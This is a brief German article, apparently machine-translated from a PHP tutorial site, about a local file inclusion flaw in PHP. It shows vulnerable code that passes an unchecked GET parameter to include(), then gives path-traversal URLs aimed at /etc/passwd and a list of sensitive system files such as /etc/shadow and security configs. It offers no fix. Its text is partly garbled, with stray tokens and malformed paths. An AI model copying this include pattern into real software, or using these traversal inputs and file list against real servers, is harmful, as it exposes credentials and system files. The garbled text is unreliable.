Heim  >  Artikel  >  Backend-Entwicklung  >  PHP fälscht lokale Dateien, die anfälligen Code enthalten

PHP fälscht lokale Dateien, die anfälligen Code enthalten

高洛峰
高洛峰Original
2016-11-30 13:17:231228Durchsuche

Der Code lautet wie folgt:
$page=$_GET['page'];
include($page.'php'); 🎜>
Sie können es so verwenden
http://www.xxx.com/index.php?page=../etc/passwd
http://www.xxx.com/index .php?page= ../../../etc/passwd
http://www.xxx.com/index.php?page=..../../etc/passwd

Weitere Updates erhalten Mehrere Daten:
etc/profile
etc/services
/etc/passwd
/etc/shadow
/etc/group
/etc/security/ Gruppe
/etc /security/passwd
/etc/security/user
/etc/security/environ
/etc/security/limits
/usr/lib/security/mkuser.default

Stellungnahme:
Der Inhalt dieses Artikels wird freiwillig von Internetnutzern beigesteuert und das Urheberrecht liegt beim ursprünglichen Autor. Diese Website übernimmt keine entsprechende rechtliche Verantwortung. Wenn Sie Inhalte finden, bei denen der Verdacht eines Plagiats oder einer Rechtsverletzung besteht, wenden Sie sich bitte an admin@php.cn